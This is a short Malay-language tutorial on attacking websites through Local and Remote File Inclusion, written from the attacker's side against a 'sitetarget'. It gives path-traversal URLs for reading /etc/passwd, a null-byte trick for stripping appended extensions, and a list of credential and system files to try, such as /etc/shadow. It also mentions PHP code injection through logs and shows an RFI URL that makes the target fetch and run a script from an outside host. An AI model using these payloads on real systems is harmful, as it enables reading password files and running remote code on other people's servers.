LFI (Local File Inclusion) ialah satu lubang yang terdapat pada site dimana attacker boleh mengakses semua file yang terdapat didalam server dengan menggunakan URL.

cara-cara LFI dilakukan :
– masukan didalam URL site vuln tersebut ../../../../../../../../../etc/passwd
– ../ menandakan kedalaman folder tempat file index.php, dengan itu fail password akan ditampilkan di browser.
– jika terdapat error seperti ini :


warning: main(../../../../../../../../../etc/passwd.php)
[function.main]: failed to open stream: No such file or
directory in /their/web/root/index.php on line 2

Tambahkan %00 (null injection untuk menghilangkan apa-apa karakter selepas passwd) dibelakangnya :

http://www.sitetarget.com/index.php?framefile=../../../../../../../../ ../etc/passwd%00

– kebiasaannya akan keluar paparan :

username: passwd:UID:GID:full_name:directory:shell

atauu

username:x:503:100:FullName:/home/username:/bin/sh

– antara tempat lain yang boleh di cuba untuk dilawati ialah :

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

– seterusnya kita lakukan injection php code melalui log. boleh rujuk tutorial yang lebih advance jika paham konsep ini.

RFI (Remote File Inclusion) ialah satu lubang yang mana attacker boleh include (menggabungkan) file dari luar server untuk dijalankan.

cara-cara RFI dilakukan :
– teknik RFI ialah kite gabungkan link fail remote dari site luar dengan website target :

http://www.sitetarget.com/index.php?framefile=

http://www.fileremote.com/script.txt

– fail fileremote.com/script.txt itu ialah fail remote kita yang akan dijalankan oleh site tersebut sebagai file *.php .